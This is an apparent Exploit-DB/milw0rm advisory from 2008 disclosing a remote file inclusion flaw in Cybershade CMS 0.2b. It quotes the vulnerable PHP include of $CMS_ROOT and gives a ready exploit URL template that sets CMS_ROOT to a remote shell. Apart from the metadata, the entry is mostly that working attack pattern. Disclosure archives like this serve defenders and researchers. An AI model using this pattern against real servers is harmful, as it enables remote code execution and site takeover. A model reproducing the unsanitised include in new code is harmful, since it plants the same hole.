Cybershade CMS 0.2b Remote File Inclusion Vulnerability

2008-10-31T00:00:00
ID EDB-ID:6887
Type exploitdb
Reporter w0cker
Modified 2008-10-31T00:00:00

Description

Cybershade CMS 0.2b Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            Script Name : Cybershare CMS
 
Download : http://sourceforge.net/project/downloading.php?group_id=213056&use_mirror=surfnet&filename=cybershade_0.2b-DEV.zip&40561526
 
Error :
include $CMS_ROOT."core/core.php";
 
Vul. Code : htp://[site]/[path]/core/includes.php?CMS_ROOT=[Shell]
 
Thanks : Kezzap66345 - Septemb0x

# milw0rm.com [2008-10-31]